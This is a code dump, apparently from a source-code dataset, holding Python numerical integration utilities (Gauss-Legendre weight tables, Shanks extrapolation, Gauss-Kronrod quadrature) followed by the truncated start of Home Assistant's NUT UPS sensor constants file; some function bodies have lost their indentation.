[ 0.8802391537269859021229557, 0.0850361483171791808835354],
[ 0.9506755217687677612227170, 0.0554595293739872011294402],
[ 0.9905754753144173356754340, 0.0241483028685479319601100]],
dtype=float),
18: np.array(
[[-0.9915651684209309467300160, 0.0216160135264833103133427],
[ -0.9558239495713977551811959, 0.0497145488949697964533349],
[ -0.8926024664975557392060606, 0.0764257302548890565291297],
[ -0.8037049589725231156824175, 0.1009420441062871655628140],
[ -0.6916870430603532078748911, 0.1225552067114784601845191],
[ -0.5597708310739475346078715, 0.1406429146706506512047313],
[ -0.4117511614628426460359318, 0.1546846751262652449254180],
[ -0.2518862256915055095889729, 0.1642764837458327229860538],
[ -0.0847750130417353012422619, 0.1691423829631435918406565],
[ 0.0847750130417353012422619, 0.1691423829631435918406565],
[ 0.2518862256915055095889729, 0.1642764837458327229860538],
[ 0.4117511614628426460359318, 0.1546846751262652449254180],
[ 0.5597708310739475346078715, 0.1406429146706506512047313],
[ 0.6916870430603532078748911, 0.1225552067114784601845191],
[ 0.8037049589725231156824175, 0.1009420441062871655628140],
[ 0.8926024664975557392060606, 0.0764257302548890565291297],
[ 0.9558239495713977551811959, 0.0497145488949697964533349],
[ 0.9915651684209309467300160, 0.0216160135264833103133427]],
dtype=float),
19: np.array(
[[-0.9924068438435844031890177, 0.0194617882297264770363120],
[ -0.9602081521348300308527788, 0.0448142267656996003328382],
[ -0.9031559036148179016426609, 0.0690445427376412265807083],
[ -0.8227146565371428249789225, 0.0914900216224499994644621],
[ -0.7209661773352293786170959, 0.1115666455473339947160239],
[ -0.6005453046616810234696382, 0.1287539625393362276755158],
[ -0.4645707413759609457172671, 0.1426067021736066117757461],
[ -0.3165640999636298319901173, 0.1527660420658596667788554],
[ -0.1603586456402253758680961, 0.1589688433939543476499564],
[ 0, 0.1610544498487836959791636],
[ 0.1603586456402253758680961, 0.1589688433939543476499564],
[ 0.3165640999636298319901173, 0.1527660420658596667788554],
[ 0.4645707413759609457172671, 0.1426067021736066117757461],
[ 0.6005453046616810234696382, 0.1287539625393362276755158],
[ 0.7209661773352293786170959, 0.1115666455473339947160239],
[ 0.8227146565371428249789225, 0.0914900216224499994644621],
[ 0.9031559036148179016426609, 0.0690445427376412265807083],
[ 0.9602081521348300308527788, 0.0448142267656996003328382],
[ 0.9924068438435844031890177, 0.0194617882297264770363120]],
dtype=float),
20: np.array(
[[-0.9931285991850949247861224, 0.0176140071391521183118620],
[ -0.9639719272779137912676661, 0.0406014298003869413310400],
[ -0.9122344282513259058677524, 0.0626720483341090635695065],
[ -0.8391169718222188233945291, 0.0832767415767047487247581],
[ -0.7463319064601507926143051, 0.1019301198172404350367501],
[ -0.6360536807265150254528367, 0.1181945319615184173123774],
[ -0.5108670019508270980043641, 0.1316886384491766268984945],
[ -0.3737060887154195606725482, 0.1420961093183820513292983],
[ -0.2277858511416450780804962, 0.1491729864726037467878287],
[ -0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.0765265211334973337546404, 0.1527533871307258506980843],
[ 0.2277858511416450780804962, 0.1491729864726037467878287],
[ 0.3737060887154195606725482, 0.1420961093183820513292983],
[ 0.5108670019508270980043641, 0.1316886384491766268984945],
[ 0.6360536807265150254528367, 0.1181945319615184173123774],
[ 0.7463319064601507926143051, 0.1019301198172404350367501],
[ 0.8391169718222188233945291, 0.0832767415767047487247581],
[ 0.9122344282513259058677524, 0.0626720483341090635695065],
[ 0.9639719272779137912676661, 0.0406014298003869413310400],
[ 0.9931285991850949247861224, 0.0176140071391521183118620]],
dtype=float),
32: np.array(
[[-0.9972638618494815635449811, 0.0070186100094700966004071],
[ -0.9856115115452683354001750, 0.0162743947309056706051706],
[ -0.9647622555875064307738119, 0.0253920653092620594557526],
[ -0.9349060759377396891709191, 0.0342738629130214331026877],
[ -0.8963211557660521239653072, 0.0428358980222266806568786],
[ -0.8493676137325699701336930, 0.0509980592623761761961632],
[ -0.7944837959679424069630973, 0.0586840934785355471452836],
[ -0.7321821187402896803874267, 0.0658222227763618468376501],
[ -0.6630442669302152009751152, 0.0723457941088485062253994],
[ -0.5877157572407623290407455, 0.0781938957870703064717409],
[ -0.5068999089322293900237475, 0.0833119242269467552221991],
[ -0.4213512761306353453641194, 0.0876520930044038111427715],
[ -0.3318686022821276497799168, 0.0911738786957638847128686],
[ -0.2392873622521370745446032, 0.0938443990808045656391802],
[ -0.1444719615827964934851864, 0.0956387200792748594190820],
[ -0.0483076656877383162348126, 0.0965400885147278005667648],
[ 0.0483076656877383162348126, 0.0965400885147278005667648],
[ 0.1444719615827964934851864, 0.0956387200792748594190820],
[ 0.2392873622521370745446032, 0.0938443990808045656391802],
[ 0.3318686022821276497799168, 0.0911738786957638847128686],
[ 0.4213512761306353453641194, 0.0876520930044038111427715],
[ 0.5068999089322293900237475, 0.0833119242269467552221991],
[ 0.5877157572407623290407455, 0.0781938957870703064717409],
[ 0.6630442669302152009751152, 0.0723457941088485062253994],
[ 0.7321821187402896803874267, 0.0658222227763618468376501],
[ 0.7944837959679424069630973, 0.0586840934785355471452836],
[ 0.8493676137325699701336930, 0.0509980592623761761961632],
[ 0.8963211557660521239653072, 0.0428358980222266806568786],
[ 0.9349060759377396891709191, 0.0342738629130214331026877],
[ 0.9647622555875064307738119, 0.0253920653092620594557526],
[ 0.9856115115452683354001750, 0.0162743947309056706051706],
[ 0.9972638618494815635449811, 0.0070186100094700966004071]],
dtype=float),
64: np.array(
[[-0.9993050417357721394569056, 0.0017832807216964329472961],
[ -0.9963401167719552793469245, 0.0041470332605624676352875],
[ -0.9910133714767443207393824, 0.0065044579689783628561174],
[ -0.9833362538846259569312993, 0.0088467598263639477230309],
[ -0.9733268277899109637418535, 0.0111681394601311288185905],
[ -0.9610087996520537189186141, 0.0134630478967186425980608],
[ -0.9464113748584028160624815, 0.0157260304760247193219660],
[ -0.9295691721319395758214902, 0.0179517157756973430850453],
[ -0.9105221370785028057563807, 0.0201348231535302093723403],
[ -0.8893154459951141058534040, 0.0222701738083832541592983],
[ -0.8659993981540928197607834, 0.0243527025687108733381776],
[ -0.8406292962525803627516915, 0.0263774697150546586716918],
[ -0.8132653151227975597419233, 0.0283396726142594832275113],
[ -0.7839723589433414076102205, 0.0302346570724024788679741],
[ -0.7528199072605318966118638, 0.0320579283548515535854675],
[ -0.7198818501716108268489402, 0.0338051618371416093915655],
[ -0.6852363130542332425635584, 0.0354722132568823838106931],
[ -0.6489654712546573398577612, 0.0370551285402400460404151],
[ -0.6111553551723932502488530, 0.0385501531786156291289625],
[ -0.5718956462026340342838781, 0.0399537411327203413866569],
[ -0.5312794640198945456580139, 0.0412625632426235286101563],
[ -0.4894031457070529574785263, 0.0424735151236535890073398],
[ -0.4463660172534640879849477, 0.0435837245293234533768279],
[ -0.4022701579639916036957668, 0.0445905581637565630601347],
[ -0.3572201583376681159504426, 0.0454916279274181444797710],
[ -0.3113228719902109561575127, 0.0462847965813144172959532],
[ -0.2646871622087674163739642, 0.0469681828162100173253263],
[ -0.2174236437400070841496487, 0.0475401657148303086622822],
[ -0.1696444204239928180373136, 0.0479993885964583077281262],
[ -0.1214628192961205544703765, 0.0483447622348029571697695],
[ -0.0729931217877990394495429, 0.0485754674415034269347991],
[ -0.0243502926634244325089558, 0.0486909570091397203833654],
[ 0.0243502926634244325089558, 0.0486909570091397203833654],
[ 0.0729931217877990394495429, 0.0485754674415034269347991],
[ 0.1214628192961205544703765, 0.0483447622348029571697695],
[ 0.1696444204239928180373136, 0.0479993885964583077281262],
[ 0.2174236437400070841496487, 0.0475401657148303086622822],
[ 0.2646871622087674163739642, 0.0469681828162100173253263],
[ 0.3113228719902109561575127, 0.0462847965813144172959532],
[ 0.3572201583376681159504426, 0.0454916279274181444797710],
[ 0.4022701579639916036957668, 0.0445905581637565630601347],
[ 0.4463660172534640879849477, 0.0435837245293234533768279],
[ 0.4894031457070529574785263, 0.0424735151236535890073398],
[ 0.5312794640198945456580139, 0.0412625632426235286101563],
[ 0.5718956462026340342838781, 0.0399537411327203413866569],
[ 0.6111553551723932502488530, 0.0385501531786156291289625],
[ 0.6489654712546573398577612, 0.0370551285402400460404151],
[ 0.6852363130542332425635584, 0.0354722132568823838106931],
[ 0.7198818501716108268489402, 0.0338051618371416093915655],
[ 0.7528199072605318966118638, 0.0320579283548515535854675],
[ 0.7839723589433414076102205, 0.0302346570724024788679741],
[ 0.8132653151227975597419233, 0.0283396726142594832275113],
[ 0.8406292962525803627516915, 0.0263774697150546586716918],
[ 0.8659993981540928197607834, 0.0243527025687108733381776],
[ 0.8893154459951141058534040, 0.0222701738083832541592983],
[ 0.9105221370785028057563807, 0.0201348231535302093723403],
[ 0.9295691721319395758214902, 0.0179517157756973430850453],
[ 0.9464113748584028160624815, 0.0157260304760247193219660],
[ 0.9610087996520537189186141, 0.0134630478967186425980608],
[ 0.9733268277899109637418535, 0.0111681394601311288185905],
[ 0.9833362538846259569312993, 0.0088467598263639477230309],
[ 0.9910133714767443207393824, 0.0065044579689783628561174],
[ 0.9963401167719552793469245, 0.0041470332605624676352875],
[ 0.9993050417357721394569056, 0.0017832807216964329472961]],
dtype=float),
100: np.array(
[[-0.9997137267734412336782285, 0.0007346344905056717304063],
[ -0.9984919506395958184001634, 0.0017093926535181052395294],
[ -0.9962951347331251491861317, 0.0026839253715534824194396],
[ -0.9931249370374434596520099, 0.0036559612013263751823425],
[ -0.9889843952429917480044187, 0.0046244500634221193510958],
[ -0.9838775407060570154961002, 0.0055884280038655151572119],
[ -0.9778093584869182885537811, 0.0065469484508453227641521],
[ -0.9707857757637063319308979, 0.0074990732554647115788287],
[ -0.9628136542558155272936593, 0.0084438714696689714026208],
[ -0.9539007829254917428493369, 0.0093804196536944579514182],
[ -0.9440558701362559779627747, 0.0103078025748689695857821],
[ -0.9332885350430795459243337, 0.0112251140231859771172216],
[ -0.9216092981453339526669513, 0.0121314576629794974077448],
[ -0.9090295709825296904671263, 0.0130259478929715422855586],
[ -0.8955616449707269866985210, 0.0139077107037187726879541],
[ -0.8812186793850184155733168, 0.0147758845274413017688800],
[ -0.8660146884971646234107400, 0.0156296210775460027239369],
[ -0.8499645278795912842933626, 0.0164680861761452126431050],
[ -0.8330838798884008235429158, 0.0172904605683235824393442],
[ -0.8153892383391762543939888, 0.0180959407221281166643908],
[ -0.7968978923903144763895729, 0.0188837396133749045529412],
[ -0.7776279096494954756275514, 0.0196530874944353058653815],
[ -0.7575981185197071760356680, 0.0204032326462094327668389],
[ -0.7368280898020207055124277, 0.0211334421125276415426723],
[ -0.7153381175730564464599671, 0.0218430024162473863139537],
[ -0.6931491993558019659486479, 0.0225312202563362727017970],
[ -0.6702830156031410158025870, 0.0231974231852541216224889],
[ -0.6467619085141292798326303, 0.0238409602659682059625604],
[ -0.6226088602037077716041908, 0.0244612027079570527199750],
[ -0.5978474702471787212648065, 0.0250575444815795897037642],
[ -0.5725019326213811913168704, 0.0256294029102081160756420],
[ -0.5465970120650941674679943, 0.0261762192395456763423087],
[ -0.5201580198817630566468157, 0.0266974591835709626603847],
[ -0.4932107892081909335693088, 0.0271926134465768801364916],
[ -0.4657816497733580422492166, 0.0276611982207923882942042],
[ -0.4378974021720315131089780, 0.0281027556591011733176483],
[ -0.4095852916783015425288684, 0.0285168543223950979909368],
[ -0.3808729816246299567633625, 0.0289030896011252031348762],
[ -0.3517885263724217209723438, 0.0292610841106382766201190],
[ -0.3223603439005291517224766, 0.0295904880599126425117545],
[ -0.2926171880384719647375559, 0.0298909795933328309168368],
[ -0.2625881203715034791689293, 0.0301622651051691449190687],
[ -0.2323024818449739696495100, 0.0304040795264548200165079],
[ -0.2017898640957359972360489, 0.0306161865839804484964594],
[ -0.1710800805386032748875324, 0.0307983790311525904277139],
[ -0.1402031372361139732075146, 0.0309504788504909882340635],
[ -0.1091892035800611150034260, 0.0310723374275665165878102],
[ -0.0780685828134366366948174, 0.0311638356962099067838183],
[ -0.0468716824215916316149239, 0.0312248842548493577323765],
[ -0.0156289844215430828722167, 0.0312554234538633569476425],
[ 0.0156289844215430828722167, 0.0312554234538633569476425],
[ 0.0468716824215916316149239, 0.0312248842548493577323765],
[ 0.0780685828134366366948174, 0.0311638356962099067838183],
[ 0.1091892035800611150034260, 0.0310723374275665165878102],
[ 0.1402031372361139732075146, 0.0309504788504909882340635],
[ 0.1710800805386032748875324, 0.0307983790311525904277139],
[ 0.2017898640957359972360489, 0.0306161865839804484964594],
[ 0.2323024818449739696495100, 0.0304040795264548200165079],
[ 0.2625881203715034791689293, 0.0301622651051691449190687],
[ 0.2926171880384719647375559, 0.0298909795933328309168368],
[ 0.3223603439005291517224766, 0.0295904880599126425117545],
[ 0.3517885263724217209723438, 0.0292610841106382766201190],
[ 0.3808729816246299567633625, 0.0289030896011252031348762],
[ 0.4095852916783015425288684, 0.0285168543223950979909368],
[ 0.4378974021720315131089780, 0.0281027556591011733176483],
[ 0.4657816497733580422492166, 0.0276611982207923882942042],
[ 0.4932107892081909335693088, 0.0271926134465768801364916],
[ 0.5201580198817630566468157, 0.0266974591835709626603847],
[ 0.5465970120650941674679943, 0.0261762192395456763423087],
[ 0.5725019326213811913168704, 0.0256294029102081160756420],
[ 0.5978474702471787212648065, 0.0250575444815795897037642],
[ 0.6226088602037077716041908, 0.0244612027079570527199750],
[ 0.6467619085141292798326303, 0.0238409602659682059625604],
[ 0.6702830156031410158025870, 0.0231974231852541216224889],
[ 0.6931491993558019659486479, 0.0225312202563362727017970],
[ 0.7153381175730564464599671, 0.0218430024162473863139537],
[ 0.7368280898020207055124277, 0.0211334421125276415426723],
[ 0.7575981185197071760356680, 0.0204032326462094327668389],
[ 0.7776279096494954756275514, 0.0196530874944353058653815],
[ 0.7968978923903144763895729, 0.0188837396133749045529412],
[ 0.8153892383391762543939888, 0.0180959407221281166643908],
[ 0.8330838798884008235429158, 0.0172904605683235824393442],
[ 0.8499645278795912842933626, 0.0164680861761452126431050],
[ 0.8660146884971646234107400, 0.0156296210775460027239369],
[ 0.8812186793850184155733168, 0.0147758845274413017688800],
[ 0.8955616449707269866985210, 0.0139077107037187726879541],
[ 0.9090295709825296904671263, 0.0130259478929715422855586],
[ 0.9216092981453339526669513, 0.0121314576629794974077448],
[ 0.9332885350430795459243337, 0.0112251140231859771172216],
[ 0.9440558701362559779627747, 0.0103078025748689695857821],
[ 0.9539007829254917428493369, 0.0093804196536944579514182],
[ 0.9628136542558155272936593, 0.0084438714696689714026208],
[ 0.9707857757637063319308979, 0.0074990732554647115788287],
[ 0.9778093584869182885537811, 0.0065469484508453227641521],
[ 0.9838775407060570154961002, 0.0055884280038655151572119],
[ 0.9889843952429917480044187, 0.0046244500634221193510958],
[ 0.9931249370374434596520099, 0.0036559612013263751823425],
[ 0.9962951347331251491861317, 0.0026839253715534824194396],
[ 0.9984919506395958184001634, 0.0017093926535181052395294],
[ 0.9997137267734412336782285, 0.0007346344905056717304063]],
dtype=float),
}
    return weights[n][:, 0], weights[n][:, 1]
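# Illustrative usage (added sketch): an n-point Gauss-Legendre rule is exact
# for polynomials of degree <= 2n - 1 on [-1, 1]. For example, the integral
# of x**2 over [-1, 1] is 2/3:
#
#     xi, wi = gauss_legendre_abscissae_and_weights(5)
#     assert np.isclose(np.sum(wi * xi**2), 2.0 / 3.0)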
def shanks_table(seq, table=None, randomized=False):
    r'''Copied from sympy.mpmath.calculus.extrapolation.py
    This shanks function is taken almost verbatim (minus an initial ctx
    argument) from sympy.mpmath.calculus.extrapolation.py:
- http://docs.sympy.org/dev/modules/mpmath/calculus/sums_limits.html#mpmath.shanks
- https://github.com/sympy/sympy/blob/master/sympy/mpmath/calculus/extrapolation.py
mpmath is BSD license
Notes
-----
Given a list ``seq`` of the first `N` elements of a slowly
convergent infinite sequence `(A_k)`, :func:`~mpmath.shanks` computes the iterated
Shanks transformation `S(A), S(S(A)), \ldots, S^{N/2}(A)`. The Shanks
transformation often provides strong convergence acceleration,
especially if the sequence is oscillating.
The iterated Shanks transformation is computed using the Wynn
epsilon algorithm (see [1]). :func:`~mpmath.shanks` returns the full
epsilon table generated by Wynn's algorithm, which can be read
off as follows:
- The table is a list of lists forming a lower triangular matrix,
where higher row and column indices correspond to more accurate
values.
- The columns with even index hold dummy entries (required for the
computation) and the columns with odd index hold the actual
extrapolates.
- The last element in the last row is typically the most
accurate estimate of the limit.
- The difference to the third last element in the last row
provides an estimate of the approximation error.
- The magnitude of the second last element provides an estimate
of the numerical accuracy lost to cancellation.
    For convenience, the extrapolation is stopped at an odd index so
    that ``shanks(seq)[-1][-1]`` always gives an estimate of the
    limit.
Optionally, an existing table can be passed to :func:`~mpmath.shanks`.
This can be used to efficiently extend a previous computation after
new elements have been appended to the sequence. The table will
then be updated in-place.
The Shanks transformation:
The Shanks transformation is defined as follows (see [2]): given
the input sequence `(A_0, A_1, \ldots)`, the transformed sequence is
given by
.. math ::
S(A_k) = \frac{A_{k+1}A_{k-1}-A_k^2}{A_{k+1}+A_{k-1}-2 A_k}
The Shanks transformation gives the exact limit `A_{\infty}` in a
single step if `A_k = A + a q^k`. Note in particular that it
extrapolates the exact sum of a geometric series in a single step.
Applying the Shanks transformation once often improves convergence
substantially for an arbitrary sequence, but the optimal effect is
obtained by applying it iteratively:
`S(S(A_k)), S(S(S(A_k))), \ldots`.
Wynn's epsilon algorithm provides an efficient way to generate
the table of iterated Shanks transformations. It reduces the
computation of each element to essentially a single division, at
the cost of requiring dummy elements in the table. See [1] for
details.
Precision issues:
    Due to cancellation effects, the sequence must typically be
    computed at a much higher precision than the target accuracy
    of the extrapolation.
If the Shanks transformation converges to the exact limit (such
as if the sequence is a geometric series), then a division by
zero occurs. By default, :func:`~mpmath.shanks` handles this case by
terminating the iteration and returning the table it has
generated so far. With *randomized=True*, it will instead
replace the zero by a pseudorandom number close to zero.
(TODO: find a better solution to this problem.)
Examples (truncated from original)
We illustrate by applying Shanks transformation to the Leibniz
series for `\pi`:
>>> S = [4*sum((-1)**n/(2*n+1) for n in range(m))
... for m in range(1,30)]
>>>
>>> T = shanks_table(S[:7])
>>> for row in T:
... print('['+', '.join(['{:.6g}'.format(v) for v in row])+']')
...
[-0.75]
[1.25, 3.16667]
[-1.75, 3.13333, -28.75]
[2.25, 3.14524, 82.25, 3.14234]
[-2.75, 3.13968, -177.75, 3.14139, -969.938]
[3.25, 3.14271, 327.25, 3.14166, 3515.06, 3.14161]
'''
if len(seq) < 2:
raise ValueError("seq should be of minimum length 2")
if table:
START = len(table)
else:
START = 0
table = []
STOP = len(seq) - 1
if STOP & 1:
STOP -= 1
    one = 1.0  # ctx.one in the mpmath original
    eps = np.spacing(1)  # +ctx.eps in the mpmath original
if randomized:
from random import Random
rnd = Random()
rnd.seed(START)
for i in range(START, STOP):
row = []
for j in range(i+1):
if j == 0:
a, b = 0, seq[i+1]-seq[i]
else:
if j == 1:
a = seq[i]
else:
a = table[i-1][j-2]
b = row[j-1] - table[i-1][j-1]
if not b:
if randomized:
b = rnd.getrandbits(10)*eps
elif i & 1:
return table[:-1]
else:
return table
row.append(a + one/b)
table.append(row)
return table
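# Reading off an estimate (added sketch, mirroring the docstring example):
# the last element of the last row is the iterated-Shanks estimate of the
# limit, here applied to partial sums of the Leibniz series for pi:
#
#     S = [4 * sum((-1)**k / (2.0 * k + 1) for k in range(m))
#          for m in range(1, 10)]
#     T = shanks_table(S)
#     estimate = T[-1][-1]  # close to np.pi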
def shanks(seq, ind=0):
"""Iterated Shanks transformation to accelerate series convergence
    Though normally applied to a 1d array, `shanks` will actually operate on
    the last dimension of `seq`, which allows for multi-dimensional arrays,
    e.g. for 2d data each row of `seq` would be a separate sequence.
Parameters
----------
seq : list or array
        If seq is a numpy array then its elements will be modified in-place.
If seq is a list then seq will not be modified.
ind : int, optional
Start index for extrapolation. Can be negative, e.g. ind=-5
will extrapolate based on the last 5 elements of the `seq`.
        Default ind=0, i.e. use all elements.
Returns
-------
out : array with 1 dim less than `seq`, or float if seq is only 1d.
Extrapolated value. If `seq` is a numpy array then due to in-place
modification the result will also be in seq[..., -1].
See Also
--------
shanks_table : Copy of sympy.mpmath.calculus.extrapolation.shanks
Provides the whole epsilon table and error estimates.
numpy.apply_along_axis : If your sequence is not in the last dimension of
an array then use np.apply_along_axis to apply it along a specific
axis.
Notes
-----
    The shanks extrapolation is performed on the last dimension of the data,
    so this also works on multi-dimensional arrays; for 2d data each row is
    a separate sequence.
    For the series:
    .. math:: A=\\sum_{m=0}^{\\infty}a_m
The partial sum is first defined as:
.. math:: A_n=\\sum_{m=0}^{n}a_m
This forms a new sequence, the convergence of which can be sped up by
repeated use of:
.. math:: S(A_n)=\\frac{A_{n+1}A_{n-1}-A_n^2}{A_{n+1}-2A_n+A_{n-1}}
"""
seq = np.atleast_1d(seq)
if ind is None:
return +seq[..., -1]
if ind < 0:
ind = seq.shape[-1] + ind
ind = max(ind, 0)
for i in range(ind, seq.shape[-1] - 2, 2):
denom = (seq[..., i + 2:] - 2 * seq[..., i + 1: -1] + seq[..., i:-2])
        if np.any(denom == 0):
return +seq[..., -1]
seq[..., i + 2:] = (
(seq[..., i + 2:] * seq[..., i:-2] - seq[..., i + 1:-1]**2) /
denom)
    return +seq[..., -1]
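# Illustrative usage (added sketch): accelerate the same Leibniz partial sums
# with the in-place array version. Note the float dtype so the in-place
# updates are not truncated:
#
#     m = np.arange(12)
#     partial = 4 * np.cumsum((-1.0)**m / (2 * m + 1))
#     approx = shanks(partial)  # far closer to np.pi than partial[-1]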
def gk_quad(f, a, b, args=(), n=10, sum_intervals=False):
"""Integration by Gauss-Kronrod quadrature between intervals
Parameters
----------
f : function or method
Function to integrate.
a, b : 1d array
Limits of integration. Must have len(a)==len(b).
args : tuple, optional
`args` will be passed to f using f(x, *args). Default args=().
n : [7,10,15,20,25,30], optional
        Number of Gauss quadrature evaluation points. Default n=10. There will
be 2*n+1 Kronrod quadrature points.
sum_intervals : [False, True]
        If sum_intervals=True the integrals over each a-b interval will be
        summed. Otherwise each interval integration will be returned. The
        error estimates will also be summed.
Returns
-------
igral : ndarray
Integral of f between a and b.
If sum_intervals=False then shape of igral will be (len(a), ...)
where ... corresponds to however many dimensions are returned
from f with scalar arguments. Each value in igral corresponds to
the corresponding a-b interval. If sum_intervals=True then igral will
have shape (...).
    err_estimate : ndarray same size as igral
        Estimate of the error in the integral, i.e. the absolute value of the
        fine (Kronrod) integral minus the coarse (Gauss) integral.
"""
ai = np.atleast_1d(a)
bi = np.atleast_1d(b)
xj_, wj1, wj2 = gauss_kronrod_abscissae_and_weights(n)
# dim1 = each integration limits, a and b
# dim2 = each quadrature point
ai = ai[:, np.newaxis]
bi = bi[:, np.newaxis]
xj_ = xj_[np.newaxis, :]
wj1 = wj1[np.newaxis, :]
wj2 = wj2[np.newaxis, :]
bma = (bi - ai) / 2 # b minus a
    bpa = (ai + bi) / 2  # b plus a
xij = bma * xj_ + bpa # xj_ are in [-1, 1] so need to transform to [a, b]
    # Get the output shape for a scalar argument and build an index tuple that
    # appends any extra dimensions so the quadrature arrays broadcast with f's
    # output (a tuple is required for indexing in modern NumPy).
    extra = np.array(f(xij.flat[0], *args))
    gen_slice = tuple([slice(None)] * xij.ndim + [None] * extra.ndim)
fij = f(xij[gen_slice], *args)
# igral1 = np.ravel(bma) * np.sum(fij * wj1, axis=1)
# igral2 = np.ravel(bma) * np.sum(fij * wj2, axis=1)
# igral1 = bma[:, 0] * np.sum(fij * wj1, axis=1)
# igral2 = bma[:, 0] * np.sum(fij * wj2, axis=1)
    igral1 = np.sum(bma[gen_slice] * fij * wj1[gen_slice], axis=1)
    igral2 = np.sum(bma[gen_slice] * fij * wj2[gen_slice], axis=1)
err_estimate = np.abs(igral2 - igral1)
if sum_intervals:
igral1 = np.sum(igral1, axis=0)
igral2 = np.sum(igral2, axis=0)
err_estimate = np.sum(err_estimate, axis=0)
return igral2, err_estimate
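# Illustrative usage (added sketch; the lambda and limits are hypothetical):
# integrate f(x) = x**2 over the two intervals [0, 1] and [1, 2]; the exact
# values are 1/3 and 7/3:
#
#     igral, err = gk_quad(lambda x: x**2, a=[0, 1], b=[1, 2], n=10)
#     # igral ~ [1/3, 7/3]; err is |Kronrod - Gauss| per interval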
def gl_quad(f, a, b, args=(), n=10, shanks_ind=False, sum_intervals=False):
"""Integration by Gauss-Legendre quadrature with subdivided interval
Parameters
----------
f : function or method
        Function to integrate. Must accept vector arguments for x. Might
        need to use numpy.vectorize.
    a, b : 1d array
        Limits of integration. Must have len(a) == len(b).
    args : tuple, optional
        `args` will be passed to f using f(x, *args). Default args=().
    n : [2-20, 32, 64, 100], optional
        Number of quadrature evaluation points. Default n=10.
    sum_intervals : [False, True]
        If sum_intervals=True the integrals over each a-b interval will be
        summed. Otherwise each interval integration will be returned.
Returns
-------
igral : ndarray
Integral of f between a and b.
If sum_intervals=False then shape of igral will be (len(a), ...)
where ... corresponds to however many dimensions are returned
from f with scalar arguments. Each value in igral corresponds to
the corresponding a-b interval. If sum_intervals=True then igral will
have shape (...).
Notes
-----
    Be careful when using large values of n. There may be precision issues.
    If f returns an ndarray when x is scalar, igral will have additional
    dimensions corresponding to those of the f-with-scalar-x output.
"""
ai = np.atleast_1d(a)
bi = np.atleast_1d(b)
xj_, wj = gauss_legendre_abscissae_and_weights(n)
# dim1 = each integration limits, a and b
# dim2 = each quadrature point
ai = ai[:, np.newaxis]
bi = bi[:, np.newaxis]
xj_ = xj_[np.newaxis, :]
wj = wj[np.newaxis, :]
bma = (bi - ai) / 2 # b minus a
    bpa = (ai + bi) / 2  # b plus a
xij = bma * xj_ + bpa # xj_ are in [-1, 1] so need to transform to [a, b]
    # Get the output shape for a scalar argument and build an index tuple that
    # appends any extra dimensions so the quadrature arrays broadcast with f's
    # output (a tuple is required for indexing in modern NumPy).
    extra = np.array(f(xij.flat[0], *args))
    gen_slice = tuple([slice(None)] * xij.ndim + [None] * extra.ndim)
fij = f(xij[gen_slice], *args)
    igral = np.sum(bma[gen_slice] * fij * wj[gen_slice], axis=1)
if sum_intervals:
igral = np.sum(igral, axis=0)
return igral
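# Illustrative usage (added sketch, parallel to gk_quad above):
#
#     igral = gl_quad(np.cos, a=[0.0], b=[np.pi / 2], n=10)
#     # igral[0] ~ sin(pi/2) - sin(0) = 1.0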
| gpl-3.0 |
soldag/home-assistant | homeassistant/components/nut/const.py | 10 | 7810 | """The nut component."""
from homeassistant.components.sensor import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_POWER,
DEVICE_CLASS_TEMPERATURE,
)
from homeassistant.const import (
ELECTRICAL_CURRENT_AMPERE,
ELECTRICAL_VOLT_AMPERE,
FREQUENCY_HERTZ,
PERCENTAGE,
POWER_WATT,
TEMP_CELSIUS,
TIME_SECONDS,
VOLT,
)
DOMAIN = "nut"
PLATFORMS = ["sensor"]
UNDO_UPDATE_LISTENER = "undo_update_listener"
DEFAULT_NAME = "NUT UPS"
DEFAULT_HOST = "localhost"
DEFAULT_PORT = 3493
KEY_STATUS = "ups.status"
KEY_STATUS_DISPLAY = "ups.status.display"
COORDINATOR = "coordinator"
DEFAULT_SCAN_INTERVAL = 60
PYNUT_DATA = "data"
PYNUT_UNIQUE_ID = "unique_id"
PYNUT_MANUFACTURER = "manufacturer"
PYNUT_MODEL = "model"
PYNUT_FIRMWARE = "firmware"
PYNUT_NAME = "name"
SENSOR_TYPES = {
"ups.status.display": ["Status", "", "mdi:information-outline", None],
"ups.status": ["Status Data", "", "mdi:information-outline", None],
"ups.alarm": ["Alarms", "", "mdi:alarm", None],
"ups.temperature": [
"UPS Temperature",
TEMP_CELSIUS,
"mdi:thermometer",
DEVICE_CLASS_TEMPERATURE,
],
"ups.load": ["Load", PERCENTAGE, "mdi:gauge", None],
"ups.load.high": ["Overload Setting", PERCENTAGE, "mdi:gauge", None],
"ups.id": ["System identifier", "", "mdi:information-outline", None],
"ups.delay.start": ["Load Restart Delay", TIME_SECONDS, "mdi:timer-outline", None],
"ups.delay.reboot": ["UPS Reboot Delay", TIME_SECONDS, "mdi:timer-outline", None],
"ups.delay.shutdown": [
"UPS Shutdown Delay",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.timer.start": ["Load Start Timer", TIME_SECONDS, "mdi:timer-outline", None],
"ups.timer.reboot": ["Load Reboot Timer", TIME_SECONDS, "mdi:timer-outline", None],
"ups.timer.shutdown": [
"Load Shutdown Timer",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.test.interval": [
"Self-Test Interval",
TIME_SECONDS,
"mdi:timer-outline",
None,
],
"ups.test.result": ["Self-Test Result", "", "mdi:information-outline", None],
"ups.test.date": ["Self-Test Date", "", "mdi:calendar", None],
"ups.display.language": ["Language", "", "mdi:information-outline", None],
"ups.contacts": ["External Contacts", "", "mdi:information-outline", None],
"ups.efficiency": ["Efficiency", PERCENTAGE, "mdi:gauge", None],
"ups.power": ["Current Apparent Power", ELECTRICAL_VOLT_AMPERE, "mdi:flash", None],
"ups.power.nominal": ["Nominal Power", ELECTRICAL_VOLT_AMPERE, "mdi:flash", None],
"ups.realpower": [
"Current Real Power",
POWER_WATT,
"mdi:flash",
DEVICE_CLASS_POWER,
],
"ups.realpower.nominal": [
"Nominal Real Power",
POWER_WATT,
"mdi:flash",
DEVICE_CLASS_POWER,
],
"ups.beeper.status": ["Beeper Status", "", "mdi:information-outline", None],
"ups.type": ["UPS Type", "", "mdi:information-outline", None],
"ups.watchdog.status": ["Watchdog Status", "", "mdi:information-outline", None],
"ups.start.auto": ["Start on AC", "", "mdi:information-outline", None],
"ups.start.battery": ["Start on Battery", "", "mdi:information-outline", None],
"ups.start.reboot": ["Reboot on Battery", "", "mdi:information-outline", None],
"ups.shutdown": ["Shutdown Ability", "", "mdi:information-outline", None],
"battery.charge": [
"Battery Charge",
